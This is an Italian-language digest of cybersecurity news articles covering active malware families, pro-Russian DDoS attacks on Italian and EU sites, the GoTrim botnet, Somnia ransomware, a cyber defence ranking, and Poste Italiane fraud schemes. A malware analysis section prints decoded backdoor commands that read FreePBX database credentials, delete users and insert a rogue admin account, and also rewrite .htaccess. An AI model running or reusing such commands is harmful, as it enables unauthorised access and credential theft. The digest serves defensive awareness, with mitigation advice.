Il malware è un termine generico che si riferisce a qualsiasi software dannoso o indesiderato, come virus, trojan, worm e ransomware. Questi programmi sono progettati per causare danni al sistema target o per raccogliere informazioni personali senza il consenso dell’utente.

I pericoli del malware sono molteplici e possono includere la perdita di dati, la violazione della sicurezza, il rallentamento del sistema, il furto di informazioni personali e il danneggiamento delle apparecchiature.

Inoltre, il malware può essere utilizzato per diffondere ulteriori minacce informatiche, come ad esempio il phishing, o per attaccare altri computer e reti.

I rischi connessi al malware dipendono dal tipo di minaccia e dalle conseguenze per l’utente o l’organizzazione. Ad esempio, il ransomware può bloccare l’accesso ai dati o al sistema fino a quando non viene pagato un riscatto, mentre il furto di informazioni personali può portare a truffe o violazioni della privacy.

Infine, il malware può causare danni finanziari diretti, come il costo della pulizia del sistema o il mancato guadagno a causa dell’interruzione delle attività.

Le minacce malware attualmente più attive

Zeus Gameover

Questo tipo di malware fa parte della famiglia dei malware “Zeus”. Zeus Gameover è un trojan (un malware camuffato da qualcosa di legittimo) che mira a ottenere informazioni finanziarie, con le quali rubare ciò che si trova in un conto bancario.

Gli esperti affermano che l’aspetto più difficile da contrastare di questo malware è il fatto che non richiede un server di “comando e controllo” centralizzato per completare le transazioni, rendendo quindi complicato per gli investigatori e le forze dell’ordine identificare i criminali dietro questi attacchi.

Zeus Gameover bypassa efficacemente i server centralizzati, creando server indipendenti con cui condividere i dati. In breve, risulta quasi impossibile determinare dove sono finiti i dati rubati.

Agent Tesla

Agent Tesla è uno spyware potente, “facile da usare” e proprio per questo motivo particolarmente diffuso negli ambienti del cyber crimine. In particolare, è un trojan ad accesso remoto (RAT) che esfiltra le credenziali, registra i tasti premuti, copia i dati della clipboard (quello che copiamo) e raccoglie le immagini dal computer di una vittima.

Negli ultimi anni, il malware Agent Tesla ha visto un enorme aumento di popolarità e sono più di 6.000 gli utenti con intenzioni malevole che pagano quote di abbonamento per ottenere la licenza di utilizzo di questo software.

Il malware include una vasta gamma di funzionalità progettate per aumentare il rischio di non essere rilevato dai sistemi di rete e spesso arriva sotto forma di allegato di posta elettronica.

Emotet

Allo stato attuale è sicuramente la minaccia più famosa. Fondamentalmente, è la botnet di maggior successo esistente.

Il suo compito è inviare campagne di malspam a miliardi di e-mail al giorno. Le macro sono il tipico vettore di infezione che richiede alla vittima di “abilitare il contenuto” nell’allegato del documento dell’ufficio.

Alla luce di questo particolare comportamento di Emotet e della sua diffusione, da quest’anno persino Microsoft ha previsto, negli ultimi aggiornamenti della suite Office, la disabilitazione delle macro come impostazione predefinita.

Qbot

Qbot (oppure Qakbot) è probabilmente il più vecchio trojan infostealing che riceve ancora aggiornamenti tutt’oggi. È stato identificato anche all’interno di campagne di malspam con allegati e collegamenti a siti Web compromessi, governate da Emotet.

Il suo lavoro è simile a Trickbot e Dridex nel spostarsi attraverso la rete e infettare l’intero ambiente. lo scopo è consentire l’accesso a quanti più dati possibile da esfiltrare per l’estorsione e per prepararsi alla fase finale dei payload del ransomware. Poiché il ransomware è la strategia di alto livello per monetizzare un ambiente infetto, Qbot è stato visto collaborare con molti gruppi ransomware di grandi nomi come Conti, ProLock ed Egregor.

FormBook

FormBook è stato il malware più utilizzato nelle attività criminali online durante il mese di agosto di quest’anno, battendo Emotet dal primo posto per la prima volta in nove mesi consecutivi. Il software per il furto di informazioni è disponibile per i criminali informatici di qualsiasi livello come malware-as-a-service ed è noto per le sue forti tecniche di evasione e il prezzo relativamente basso. Lo si noleggia e chiunque, anche con basse competenze informatiche, può adoperarlo.

Il malware prende di mira i computer Windows e, una volta distribuito, “può raccogliere credenziali, schermate, monitorare e registrare sequenze di tasti, nonché scaricare ed eseguire file in base ai suoi ordini di comando e controllo (C&C)”, secondo una ricerca portata avanti da Check Point.

AlienBot e Joker

AlienBot e Joker sono trojan bancari per il sistema operativo Android di Google. Venduti come malware-as-a-Service, hanno molte delle stesse funzionalità dei RAT, come il furto di credenziali e la registrazione dei touch. Inoltre hanno anche sviluppato capacità di registrazione audio e raccolta di SMS. Nello specifico Joker effettua iscrizioni a servizi SMS premium che fanno perdere denaro alle vittime con abbonamenti mensili.

IcedID

Popolare trojan bancario che utilizza tecniche evasive come l’iniezione di processi e la steganografia e ruba dati finanziari tramite attacchi di reindirizzamento e di web injection. IcedID è stato il vero dominatore in Italia per gran parte del 2022, secondo una recente ricerca di CheckPoint.

Consigli per difendersi dai malware

Per proteggersi dal malware è importante adottare delle buone pratiche di sicurezza, come:

1. tenere il sistema e gli antivirus aggiornati: gli aggiornamenti di sistema e gli antivirus includono spesso patch per vulnerabilità note e possono aiutare a proteggere il sistema dalle minacce;
2. fare attenzione alle email e ai siti Web sospetti: non aprire allegati o link sospetti provenienti da mittenti sconosciuti o non attendibili, e prestare attenzione ai siti Web che potrebbero essere stati creati con l’obiettivo di diffondere malware;
3. utilizzare un firewall: un firewall aiuta a proteggere il sistema dalle connessioni indesiderate e a bloccare il traffico sospetto;
4. utilizzare una password sicura e diversa per ogni account: le password deboli possono essere indovinate o crackate facilmente, quindi è importante utilizzare password sicure e diverse per ogni account;
5. fare un backup regolare dei dati: in caso di attacco di ransomware o altre minacce che possono causare la perdita di dati, avere un backup può aiutare a ripristinare i file senza dover pagare il riscatto.

FONTE: cybersecurity360

FONTE: redhotcyber

Un gruppo di hacktivisti filorussi chiamati Noname aveva già recentemente preso di mira il Ministero dell’Agricoltura italiano www[.]politicheagricole[.]it.

All’interno di un nuovo post sul loro canale telegram viene riportato quanto segue:

Abbiamo deciso di punire il sistema di e-learning militare italiano - ha fatto crollare un vero sito web.

E una lunga lista di link a check-host, un sito che consente di visualizzare la raggiungibilità di una url da diversi posizioni nel mondo.

Ora l’attacco risulta più esteso in quanto vengono presi di mira 9 diversi sotto domini del ministero della difesa:

1. http://selene.esercito.difesa.it/
2. http://siac.difesa.it/
3. http://e-learning.esercito.difesa.it/
4. http://aulavirtuale2.elearning.esercito.difesa.it/
5. http://aulavirtuale4.elearning.esercito.difesa.it/
6. http://e-net.elearning.esercito.difesa.it/
7. http://ei-cast2.elearning.esercito.difesa.it/
8. http://pmfa.esercito.difesa.it/
9. http://babele.esercito.difesa.it/

Ricordiamo che i criminali informatici di NoName risultano essere collegati ad un altro canale underground chiamato DDoS Project, dove costantemente i membri discutono di software per effettuare questo genere di attacco e quindi fermare i servizi per superamento delle capacità di carico.

La scorsa volta, l’attacco era stato sferrato dopo una serie di dichiarazioni dei politici italiani che non erano piaciute al gruppo di hacker filorussi.

Le notizie in questione, come riportano i criminali informatici, erano relative alle dichiarazioni di Giorgia Meloni di sostenere ulteriormente l’Ucraina, alla fornitura di armi all’Ucraina.

FONTE: redhotcyber

GoTrim: botnet per attacchi brute force

I primi attacchi sono stati rilevati a settembre e la campagna è ancora in corso. I gestori di GoTrim assegnano un elenco di siti “bersaglio” e di password da testare ad ogni bot. Il tentativo di accesso avviene tramite la tecnica “brute force“. Se viene individuata la password di amministratore, il sito è aggiunto alla botnet attraverso l’installazione ed esecuzione di uno script PHP. Le credenziali sono inviate al server C2C (command and control).

Successivamente lo script PHP (che ha scaricato il client della botnet sui computer) e il componente brute force vengono cancellati per non lasciare tracce. Il nuovo bot, ovvero il sito infettato, rimane in attesa di comandi. Lo scanner di GoTrim è scritto in linguaggio Go, noto per il supporto multi-piattaforma, ma la maggioranza degli attacchi sono stati effettuati contro server Linux.

I ricercatori di Fortinet hanno individuato oltre 30.000 domini nell’elenco dei siti target. Durante la scansione vengono esclusi i siti “managed” ospitati su WordPress.com, in quanto hanno misure di protezione più efficaci. I bersagli sono invece i siti WordPress “self-hosted”. Per evitare la rilevazione viene simulata una richiesta di Firefox. In alcuni casi, la botnet può anche risolvere i CAPTCHA.

Gli amministratori dei siti dovrebbero usare password robuste (difficili da indovinare) e attivare l’autenticazione in due fattori. Ovviamente è consigliata l’installazione delle ultime versione del CMS e dei plugin. Ciò riduce al minimo il rischio di furto dei dati personali degli utenti, come quelli delle carte di credito.

FONTE: punto-informatico

Scritto in PHP e JavaScript, FreePBX è una GUI open source basata sul web che gestisce Asterisk, un voice over IP e un server di telefonia. Questo software open source consente agli utenti di creare sistemi telefonici dei clienti.

Durante una recente indagine, mi sono imbattuto in un semplice malware mirato al portale Asterisk Management di FreePBX che consentiva agli aggressori di aggiungere ed eliminare arbitrariamente utenti, nonché di modificare il file .htaccess del sito web.

Diamo un’occhiata più da vicino a questa backdoor.

Script PHP

Il seguente script PHP è stato trovato su un sito Web WordPress compromesso.

Il malware contiene una serie di controlli per limitare l’accesso:

• Controlla l’IP dell’utente per assicurarsi che corrisponda a 178.162.201.166 (che sembra appartenere a una rete per Leaseweb Deutschland GmbH
• Controlla se l’utente ha effettuato una richiesta con un valore di password che corrisponde all’hash md5 fornito:

Se questi controlli vengono superati, il PHP esegue un comando esterno passato nel parametro secmd della richiesta. Da questo esempio, possiamo vedere alcune stringhe con codifica base64 nella funzione di sistema. Diamo un’occhiata a cosa fanno..

Comandi nascosti in base64

Una volta decodificate, le stringhe base64 rivelano il vero comportamento della backdoor:

mysql `grep AMPDB /etc/amportal.conf|grep "USER\|PASS\|NAME"| sed 's/AMPDBUSER/a/g'|sed 's/AMPDBPASS/b/g'|sed 's/AMPDBNAME/c/g'|sed 's/a=/-u/g'|sed 's/b=/ -p/g'|sed 's/c=/ /g'|tr -d '\n'` --execute "DELETE from ampusers where username!='admin';INSERT INTO ampusers (username,password_sha1,sections) VALUES ('mgknight','33c7a4df46b1a9f7d4a4636d476849205a04c6b7','*');"

echo 'Order Deny,Allow`deny from all`<Files subdirectory/*>`    deny from all`</Files>`<FilesMatch "\..*$">` Deny from all`</FilesMatch>`<FilesMatch "(^$|index\.php|config\.php|\.(gif|GIF|jpg|jpeg|png|css|js|swf|txt|ico|ttf|svg|eot|woff|wav|mp3|aac|ogg|webm)$|bootstrap\.inc\.php)">` Allow from all`</FilesMatch>`php_value max_input_vars 5000'|tr '`' '\n'>.htaccess

Queste stringhe decodificate consentono alla funzione di sistema di recuperare il database amportal, l’utente del database e la password.

I comandi utilizzano le utilità grep e sed per manipolare il file di configurazione Asterisk amportal.conf. Utilizza quindi l’utilità mysql per eseguire una query SQL che elimina gli utenti dal database, quindi inserisce il proprio utente malintenzionato con il nome mgknight, consentendo agli aggressori di accedere al portale di gestione di Asterisk.

Se non vengono fornite istruzioni, il malware per impostazione predefinita aggiorna le credenziali di accesso di FreeBPX e aggiunge regole al file .htaccess. Queste direttive specificano a quali file deve essere consentito o negato l’accesso in base ai loro nomi e alla loro posizione nell’albero delle directory, nonché al valore delle direttive php_value max_input_vars.

Passaggi di attenuazione:

Le backdoor vengono spesso sfruttate dagli aggressori per ottenere l’accesso non autorizzato ai siti web molto tempo dopo che si è verificata l’infezione iniziale. In questo caso, il semplice script PHP dell’attaccante ha fornito loro tutta la potenza necessaria per aggiungere e modificare arbitrariamente gli utenti nel portale di gestione di Asterisk, oltre a modificare il file .htaccess del sito.

Per mitigare il rischio, ci sono una serie di passaggi che puoi adottare per proteggere il tuo sito Web dalle backdoor:

1. Mantieni aggiornati software, plug-in, temi e componenti estensibili. Applica sempre la patch all’ultima versione per assicurarti di proteggerti dalle vulnerabilità software note.
2. Usa password complesse e univoche per tutti i tuoi account. Ciò include le credenziali per gli utenti sFTP, database, cPanel e admin.
3. Scansiona regolarmente il tuo sito Web alla ricerca di malware e backdoor. Ciò significa scansionare periodicamente il tuo sito a livello di client e server per identificare qualsiasi codice dannoso o backdoor del sito web.
4. Monitora i log del tuo sito web. Verifica la presenza di comportamenti insoliti o sospetti e prendi in considerazione l’utilizzo di un sistema di monitoraggio dell’integrità dei file per identificare gli indicatori di compromissione.
5. Utilizzare un firewall per applicazioni Web (WAF). I firewall possono aiutare a prevenire la forza bruta, i bot dannosi e a rilevare potenziali attacchi nel tuo ambiente.

FONTE: sucuri.net

Gli hacktivisti russi hanno crittografato i sistemi e causato interruzioni a diverse organizzazioni ucraine utilizzando una nuova versione del ransomware Somnia. CERT-UA ha confermato l’incidente e ha accusato From Russia with Love (FRwL), noto anche come Z-Team, tracciato da UAC-0118.

Vale la pena notare che le accuse non sono infondate: gli hacktivisti hanno annunciato la creazione di Somnia nel loro canale Telegram e hanno persino pubblicato prove di attacchi a un’organizzazione ucraina impegnata nella produzione di carri armati.

Un’indagine condotta da CERT-UA ha mostrato che l’attacco è iniziato con il download e l’esecuzione da parte della vittima di un file che si spacciava per un software chiamato “Scanner IP avanzato”, che in realtà conteneva l’infostealer Vidar. 

Questo malware ruba i dati della sessione di Telegram che, in assenza dell’autenticazione a due fattori e di un passcode, consente agli aggressori di accedere all’account della vittima.

Come è stato stabilito, l’account Telegram era necessario agli hacker per rubare i dati di connessione VPN (inclusi certificati e dati di autenticazione). Avendo ottenuto l’accesso remoto alla rete di computer dell’organizzazione tramite una VPN, gli aggressori hanno condotto una ricognizione (usando Netscan), lanciato un beacon Cobalt Strike e rubando dati preziosi usando Rclone. Inoltre, ci sono segnali del lancio di Anydesk e Ngrok.

Gli specialisti hanno notato che Somnia è stato modificato. 

Se nella prima versione del programma è stato utilizzato l’algoritmo 3DES simmetrico, nella seconda versione viene implementato l’algoritmo AES. E dato il dinamismo della chiave e del vettore di inizializzazione, CERT-UA presume che questa versione del malware non fornisca la decrittazione dei dati.

FONTE: redhotcyber

Subito dopo la votazione con cui l’organo legislativo dell’Unione Europea ha identificato ufficialmente la Russia come sponsor del terrorismo, gli attivisti digitali pro Cremlino, sotto le direttive del gruppo KillNet, hanno unito le proprie operazioni per sferrare un attacco DDoS contro il sito Web del Parlamento Europeo, rendendolo irraggiungibile per diverse ore durante il pomeriggio di ieri, mercoledì 23 novembre 2022.

L’attacco DDoS di KillNet contro il Parlamento UE

Il Parlamento Europeo, dunque, è stato l’ultimo importante target di questi attacchi di hacktivismo, proprio a seguito della votazione che ha messo nero su bianco il riconoscimento di stato terroristico alla Russia. Un attacco che conferma il legame sempre più stretto che c’è e sempre di più ci sarà in futuro tra la politica e la cyber.

“Gli attacchi deliberati e le atrocità perpetrate dalla Federazione Russa contro la popolazione civile ucraina, la distruzione di infrastrutture civili e altre gravi violazioni dei diritti umani e del diritto internazionale umanitario equivalgono ad atti di terrore contro la popolazione ucraina e costituiscono crimini di guerra”, lo hanno detto i deputati in una risoluzione non vincolante ma altamente simbolica.

“Alla luce di quanto sopra, (il Parlamento europeo) riconosce la Russia come uno stato sponsor del terrorismo e come uno stato che utilizza mezzi del terrorismo”.

La votazione su questa risoluzione ha ricevuto grande consenso tra i parlamentari presenti all’assemblea, conseguendo il risultato di 494 voti favorevoli, 58 contrari e 44 astenuti.

Non appena conseguiti i primi risultati dell’operazione di attivismo contro il Parlamento, la cyber gang KillNet ha prontamente rivendicato l’attacco, su Telegram, svelando lo stato di non disponibilità del sito Web già da prima delle ore 14.00.

L’attacco è riuscito a perdurare per diverse ore, almeno fino alle ore 20.00: anche la presidente del Parlamento Europeo, Roberta Metsola, ha condiviso lo stato di down con un tweet.

Attacchi motivati politicamente contro l’Europa

Il nuovo attacco DDoS fa parte, appunto, dell’hacktivismo sviluppato a seguito dell’invasione russa dell’Ucraina, con manifestazioni ripetute nel corso di questi mesi, contro organizzazioni pubbliche e private, strategiche e significative per uno Stato. Ci sono schieramenti pro Ucraina ma anche pro Russia. Killnet fa parte di questi ultimi e agiscono unicamente con l’organizzazione di massicci attacchi Distributed Denial of Service, unendo le forze del seguito che il gruppo ha creato attorno a se in questi mesi, contro target e obiettivi decisi di volta in volta dalla linea decisionale del gruppo stesso.

Dall’inizio dell’invasione russa dell’Ucraina, KillNet ha reclutato attivamente volontari, spesso organizzandoli in diverse squadre con nomi come “Kratos”, “Rayd” e “Zarya”, per condurre tali attacchi contro le nazioni dell’occidente.

Anche in Italia, lo ricordiamo, c’è stato l’intervento contro strutture strategiche come il Ministero della Difesa o la Polizia di Stato.

FONTE: cybersecurity360

L’Italia è tra i primi 10 Paesi al mondo che “stanno facendo progressi o si stanno impegnando per creare un ambiente di difesa informatica”.

Lo rivela il nuovo Cyber ​​​​Defense Index 2022/23, il report prodotto dal MIT Technology Review Insights in associazione con Code42, la prima classifica comparativa delle 20 economie più grandi e più digitalmente avanzate del mondo sulla preparazione, risposta e ripresa dalle minacce alla sicurezza informatica.

I Paesi vengono valutati in base a quanto le istituzioni hanno adottato tecnologia avanzate e pratiche per resistere agli attacchi informatici.

Sulla base di ricerche qualitative e quantitative condotte tra aprile 2022 e settembre 2022, l’indice interattivo mostra quali Paesi stanno costruendo i migliori ambienti di difesa informatica.

L’Italia all’11esimo posto nel ranking. Ottime le risorse investite per la cybersecurity. Ma stentiamo nella capacità organizzativa

L’Italia è all’undicesimo posto, con una valutazione di 6.37, in una classifica guidata dall’Australia (7.83), dai Paesi (7.61), Corea del Sud (7.41), Stati Uniti (7.13) e Canada (6.94), considerando tutti i Paesi del G20 esclusa la Russia ma inclusa la Polonia.

Dei quattro pilastri analizzati, l’Italia è sesta in cybersecurity resources, che ha come indicatori:

• gli impegni in materia di cybersecurity;
• lo stato della legislazione in materia di privacy e protezione dei dati;
• i punti di forza relativi di diverse capacità di cybersecurity delle organizzazioni (dati e analisi, IA, tecnologie blockchain e digital ledger, risorse di risposta antiphishing e risorse di risposta anti-ransomware).

Tra le annotazioni degli autori del rapporto riguardo all’Italia c’è l’avviso dell’Agenzia per la Cybersicurezza Nazionale, guidata dal direttore generale Roberto Baldoni, sugli attacchi informatici alle infrastrutture critiche del Paese, destinati ad aumentare, sulla scia di attacchi ransomware a fornitori di energia, tra cui Eni.

È ottava per critical infrastructure, che comprende il numero di data center nel Paese, i server sicuri e lo stato di servizi pubblici, infrastrutture critiche, servizi finanziari, infrastrutture 5G e sicurezza IoT/edge. È undicesima per policy commitment, cioè per l’efficacia e la qualità della regolamentazione in materia di cybersecurity da parte del governo.

È quasi in fondo alla classifica, al diciassettesimo posto, per organizational capacity, un pilastro che misura la maturità in materia di cybersecurity e l’esperienza digitale delle imprese e delle altre istituzioni in ogni Paese.

FONTE: cybersecitalia

Le frodi informatiche che prendono di mira le attività finanziarie sono senza dubbio le più sensibili, visto il settore che coinvolgono. Inoltre, i danni economici che i clienti potrebbero subire sono notevoli e potrebbero avere un forte impatto sull’economia e i risparmi dei cittadini.

In Italia, il brand di Poste Italiane è sicuramente tra quelli maggiormente presi di mira per frodi informatiche di ogni tipo, proprio per la capillarità sul territorio dell’Istituto e l’alta probabilità, sui grandi numeri, che il lancio di una campagna malevola colpisca un effettivo titolare cliente di Poste o che abbia avuto qualcosa a che fare con l’ente, anche in passato.

In questa guida si analizzano le diverse tipologie di truffe e frodi online che finora hanno impattato su questo brand, per conoscerle ed evitarle.

Il phishing contro Poste Italiane

Ogni giorno nascono e vengono diffuse tante pagine Web che letteralmente copiano (anche per il tramite di tool appositi), il design e i contenuti di pagine strategiche di Poste Italiane, contenenti form da compilare con dati personali.

Il phishing, infatti, ha come primario obiettivo proprio quello di raggirare la vittima sfruttando la somiglianza delle pagine malevoli con quelle ufficiali al fine di carpirne i dati sensibili personali.

Questi dati, per le cyber gang, rivestono un ruolo fondamentale nella pianificazione di altri attacchi futuri, sempre più mirati, proprio grazie alle informazioni che clienti ignari hanno consegnato loro tramite queste finte pagine Web che, da un’analisi leggermente più attenta, non hanno niente a che vedere con l’organizzazione ufficiale di Poste Italiane.

Queste pagine Web fraudolente nascono sotto domini impensabili e difficilmente raggiungibili senza conoscerne l’URL, ma si diffondono sotto forma di link, pulsanti e infografiche cliccabili trasmesse mediante messaggi e-mail o SMS.

Nei casi più complessi, le campagne di phishing a tema Poste Italiane vengono arricchite di informazioni sulla vittima, recuperate da condivisioni pubbliche e aperte sui social network, di modo da indirizzare la campagna malevola in maniera più credibile per la vittima.

Nonostante tutto, è importante identificare il mittente di queste comunicazioni, soprattutto nel caso di e-mail che, per la maggior parte dei casi, riporteranno un indirizzo di posta elettronica facilmente riconoscibile come non appartenente a Poste Italiane.

Qualsiasi sia il contenuto della comunicazione, resta inoltre fondamentale verificarne l’oggetto prima di dar seguito alle istruzioni contenute, per esempio contattando il nostro riferimento di Poste Italiane nel caso fossimo clienti o verificando nell’area riservata del nostro account sul sito ufficiale dell’Istituto, ma sicuramente senza mai cliccare sui link contenuti nelle e-mail o nei messaggi SMS.

Se non dovessimo trovare alcuna corrispondenza tra le comunicazioni disponibili, allora quasi certamente siamo di fronte a una truffa.

Attacchi di tipo man-in-the-middle

Il classico phishing via e-mail di Poste Italiane è stato individuato, in alcune campagne malevole, equipaggiato da allegati infetti distribuiti sottoforma di archivi ZIP o fogli di calcolo Excel, che al loro interno hanno il codice utile a scaricare altri malware. La tecnica che questi malware sfruttano è nota come man-in-the-middle.

Sostanzialmente, una volta infettato un dispositivo, il software malevolo si frappone tra la vittima e l’operazione che sta svolgendo con la capacità di modificarne all’ultimo momento utile i dati che inserisce quando utilizza app o compila campi di testo nei form presenti sul sito web dell’istituto bancario.

Per fare un esempio, si può facilmente rappresentare questo attacco con l’operazione di bonifico, effettuata tramite l’area riservata dell’account BancoPosta, operazione ormai comune per chiunque sia da computer sia da app mobile.

Se il dispositivo che stiamo utilizzando è stato precedentemente infettato, durante la compilazione del codice IBAN destinatario, il malware interverrà, rispetto a ciò che desideriamo inserire noi, e modificherà le coordinate con IBAN sotto il controllo criminale, senza che noi ce ne accorgiamo.

Di fatto, quindi, confermeremo l’operazione portando avanti uno spostamento di denaro a vantaggio del frodatore e non del legittimo destinatario che noi pensiamo di avere indicato.

Normalmente, quando ci si accorge dell’errato movimento, risulta essere sempre troppo tardi perché di fatto il bonifico sarà già trasmesso e, se arrivato a destinazione, potenzialmente prelevato dal conto di arrivo, di modo da non consentirne il richiamo.

Questo è il tipico esempio di sfruttamento del man-in-the-middle, tecnica al centro della cronaca proprio di recente per via di una massiccia operazione riguardante Poste Italiane e coordinata dal Servizio Polizia Postale di Roma e dal Centro Operativo per la Sicurezza Cibernetica di Bologna.

In questo caso, solo a seguito di accurate e lunghe indagini si è riuscito a risalire alla cifra sottratta con la frode che, visto l’importo (ben 1.300.000 euro) ricopriva carattere di urgenza.

Ci sono, però, tanti piccoli movimenti, con importi meno significativi, che sottraggono cifre ai legittimi proprietari tramite questa tecnica e che difficilmente vengono recuperati, proprio perché non assoggettati a indagine.

La minaccia subdola del social engineering

Può sembrare una tecnica superata nel 2022, ma il vecchio “raggiro” è ancora oggi considerato tra le tecniche più prolifiche anche ai danni dei clienti di Poste Italiane.

L’ingegneria sociale, applicata a tecniche di phishing tramite SMS o e-mail, conferisce all’attaccante un potere condizionale sulla vittima, rendendolo così capace di operare operazioni economiche ai danni della clientela.

Nel caso specifico, queste truffe iniziano sempre con un contatto di phishing il cui mittente viene accuratamente emulato dall’attaccante per apparire legittimo e nel quale si richiedono dei dati personali specifici.

Se la vittima viene indotta a “completare” questo primo passaggio, la frode passa al livello successivo che, normalmente, avviene con una chiamata telefonica nella quale, fingendosi personale interno di Poste Italiane, gli attaccanti convinceranno la vittima ad eseguire determinate operazioni per risolvere alcuni aspetti di sicurezza o attivare, ad esempio, la carta di credito.

Tutte motivazioni assolutamente false se estrapolate dal contesto, ma Cybersecurity360 ha avuto modo di intervistare un campione di vittime che hanno subito attacchi di questo tipo, di età differente, e ciò che avviene è quasi una ipnosi del cliente che davanti alla voce dell’autorità riconosciuta (il dipendente di Poste Italiane), difficilmente riesce a discernere la natura delle operazioni che gli viene richiesto di eseguire.

La più tristemente nota, ancora oggi in corso, è la campagna condotta mediante una chiamata telefonica durante la quale la vittima viene convinta a uscire di casa, recarsi presso uno sportello Postamat, rimettersi in contatto con il malvivente e, davanti al dispencer di denaro, effettuare con la propria carta ricariche di carte prepagate spacciate come necessarie per testare il servizio di pagamento della propria carta. La realtà è che, di fatto, viene svuotato il conto corrente dell’ignara vittima operazione dopo operazione (viene fatta ripetere di solito dalle 3 alle 5 volte).

Resta un mistero come le persone riescano a fidarsi così tanto di una persona mai sentita prima, via telefono. Però questo è fatto quotidiano di cronaca, che impatta su una larga fascia di clientela indipendentemente dall’età.

Attacchi BEC (Business Email Compromise)

Questa truffa è rivolta direttamente a Poste Italiane e non ai suoi clienti.

In pratica, arriva una banale e-mail agli uffici centrali di Poste Italiane: come destinatario c’è proprio il responsabile dei pagamenti di quell’ufficio.

Il testo dell’e-mail richiede il saldo di una rata verso un nuovo IBAN, in sostituzione del vecchio fino ad allora utilizzato, per una fornitura da parte di qualche altro ente o azienda (il più delle volte viene sfruttato il marchio Microsoft vista la sua importanza e “visibilità”) realmente esistente.

Per portare a segno la truffa, i criminali utilizzano un indirizzo di posta, creato ad hoc, con dominio @mlcrosoft e non @microsoft, ovvero una “elle” minuscola al posta della “i”: un “errore” che non desta preoccupazione all’ufficio che prontamente autorizza il pagamento.

Questo lo scenario di una recente vicenda di cronaca che ha visto protagonista proprio Poste Italiane, subendo un attacco tipicamente noto come Business Email Compromise.

L’attacco BEC è perpetrato ai danni di un’organizzazione aziendale, via e-mail, operato su scala mirata e non random come il normale phishing.

I criminali, in questo caso, conoscevano l’effettiva natura della fattura Microsoft e come era strutturato l’accordo o le comunicazioni fino ad allora intercorse tra le due aziende. Ciò, ovviamente, prevede una precedente fase di compromissione dei sistemi (mediante software malevolo o mediante insiders) per carpire quante più informazioni interne possibili, utili successivamente a mettere in pratica la truffa.

Conclusioni e mitigazioni

Gli scenari analizzati finora sono le possibili truffe che la cronaca ci ha insegnato a monitorare ai danni di Poste Italiane e dei suoi clienti. Tutte queste frodi, come possiamo desumere, hanno un fattore di rischio comune: il fattore umano.

L’anello debole di molte di queste catene della sicurezza informatica infatti passa proprio per il fattore umano. Volendo trovare un modo efficace di difesa, in questo scenario, non possiamo far altro che consigliare di lavorare sulla consapevolezza dei rischi cyber da parte dei propri dipendenti.

L’educazione del personale aziendale su temi cyber riveste un ruolo sempre più importante, soprattutto per accendere una lampadina di allarme davanti a gesti, apparentemente normali, come possono essere la chiamata telefonica o la lettura di una comunicazione via e-mail.

Allo stesso tempo, i clienti/cittadini devono imparare che né Poste Italiane né altri istituti di credito chiameranno mai telefonicamente i propri clienti per risolvere problemi relativi alla sicurezza dell’account, chiedendo una collaborazione attiva.

Gli uffici centrali sono perfettamente in grado di disporre qualsiasi tipo di operazione sui servizi che ci stanno offrendo, senza il nostro intervento.

Le credenziali di accesso, i dati delle carte di credito e i codici segreti o PIN di carte e applicazioni, devono rimanere segreti. Sono strettamente personali e non esisterà mai alcun motivo valido per comunicarli ad una terza persona con alcun mezzo di comunicazione orale o scritto.

Fondamentale anche imparare a riconoscere il mittente di un messaggio di posta elettronica, così come riconoscere eventuali link presenti all’interno del testo prima di cliccarci sopra. È importante, inoltre, diffidare sempre da comunicazioni ricevute e non attese, soprattutto se contenenti messaggi particolarmente allarmanti o attraenti (sconti e offerte), ancor di più se ci sono anche allegati.

FONTE: cybersecurity